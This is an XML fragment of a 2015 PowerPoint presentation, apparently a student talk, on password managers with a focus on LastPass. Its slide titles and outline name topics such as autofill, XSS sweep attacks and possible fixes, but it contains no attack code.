              <a:t>of Password Managers - 1 min</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>of Password Managers -  1 min</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	Advantages/Disadvantages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>- 1 min</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/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4904" y="1671146"/>
            <a:ext cx="53129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/>
              <a:t>In-depth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>LastPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t> ( 3 min )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>min </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>for other slides )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	History Lesson </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	Short Video Demo ( 1min50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>seconds</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	Overview -   2.5 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>-Security Issues ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>min )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	- How safe are they really? </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	- Autofill features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>- XSS Sweeps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>- Injection &amp; Extraction Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>- Possible Fixes</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>-Conclusion ( 2 min </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>- Brief Summary for closing</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>- Personal opinions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0"/>
              <a:t>on Password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Managers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81245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1434" y="255134"/>
            <a:ext cx="11303876" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>What is a Password Manager?</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6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150" y="2396276"/>
            <a:ext cx="3644444" cy="33523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42000" y="2396276"/>
            <a:ext cx="533511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 smtClean="0"/>
              <a:t>Software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 smtClean="0"/>
              <a:t>Stores large collection of passwords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 smtClean="0"/>
              <a:t>Single Master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 smtClean="0"/>
              <a:t>Storage Differences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 smtClean="0"/>
              <a:t>Additional Features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47555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6000" dirty="0" smtClean="0"/>
              <a:t>How do they work?</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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618" y="1636109"/>
            <a:ext cx="6876764" cy="52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5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6000" dirty="0" smtClean="0"/>
              <a:t>Who uses them and why?</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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72" y="1837499"/>
            <a:ext cx="5175504" cy="3447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370" y="2213356"/>
            <a:ext cx="6410325" cy="2695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316264"/>
            <a:ext cx="38100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1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555" y="3841683"/>
            <a:ext cx="6655466" cy="963328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Types of Managers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="60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6" r="202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0529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1820" y="255134"/>
            <a:ext cx="11539470" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Password Manager Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1750230" y="1595021"/>
            <a:ext cx="9195146" cy="52629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CA" sz="4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Desktop or Stand-alone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CA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Embedded Security Hardware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CA" sz="4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Portable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CA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Token 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CA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Web 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CA" sz="4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Cloud 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CA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Stateless</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="4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300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6000" dirty="0" smtClean="0"/>
              <a:t>List of Password Managers</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6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9" y="1863667"/>
            <a:ext cx="10912381" cy="449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5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Direction_16x9.potx" id="{FE35DD5A-B687-4161-B4D9-35484B75A379}" vid="{5DB76398-B2EF-4269-B3B2-C0E4C29F3554}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2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567D146-4D1C-466E-9A63-FAD8863F0C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direction presentation (widescreen)</Template>
  <TotalTime>0</TotalTime>
  <Words>1074</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>350</Paragraphs>
  <Slides>34</Slides>
  <Notes>20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Book Antiqua</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Sales Direction 16X9</vt:lpstr>
      <vt:lpstr>Password Managers</vt:lpstr>
      <vt:lpstr>Presentation Outline</vt:lpstr>
      <vt:lpstr>Introduction  “Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months.”  Clifford Stoll</vt:lpstr>
      <vt:lpstr>What is a Password Manager?</vt:lpstr>
      <vt:lpstr>How do they work?</vt:lpstr>
      <vt:lpstr>Who uses them and why?</vt:lpstr>
      <vt:lpstr>Types of Managers</vt:lpstr>
      <vt:lpstr>Password Manager Types</vt:lpstr>
      <vt:lpstr>List of Password Managers</vt:lpstr>
      <vt:lpstr>Advantages &amp; Disadvantages</vt:lpstr>
      <vt:lpstr>LastPass Overview</vt:lpstr>
      <vt:lpstr>A little history on LastPass…</vt:lpstr>
      <vt:lpstr>Supported Systems</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>VIDEO DEMO</vt:lpstr>
      <vt:lpstr>Overview on LastPass</vt:lpstr>
      <vt:lpstr>Security Concerns</vt:lpstr>
      <vt:lpstr>How safe are they really?</vt:lpstr>
      <vt:lpstr>Autofill Features</vt:lpstr>
      <vt:lpstr>Sweep Attacks</vt:lpstr>
      <vt:lpstr>Injection &amp; Extraction Techniques</vt:lpstr>
      <vt:lpstr>Injection &amp; Extraction Techniques</vt:lpstr>
      <vt:lpstr>Possible Fixes</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>In summary…</vt:lpstr>
      <vt:lpstr>Opinion on Password Managers</vt:lpstr>
      <vt:lpstr>REFERENCES ( Documents )</vt:lpstr>
      <vt:lpstr>REFERENCES ( Documents )</vt:lpstr>
      <vt:lpstr>REFERENCES ( Documents )</vt:lpstr>
      <vt:lpstr>REFERENCES ( Images )</vt:lpstr>
      <vt:lpstr>REFERENCES ( Images )</vt:lpstr>
      <vt:lpstr>REFERENCES ( Images )</vt:lpstr>
      <vt:lpstr>Stay password safe!  Thank you</vt:lpstr>
      <vt:lpstr>PRESENTATION OUTLINE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2015-03-07T23:01:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-04-23T10:29:04Z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TC034313749991</vt:lpwstr>
  </property>
</Properties>
</file>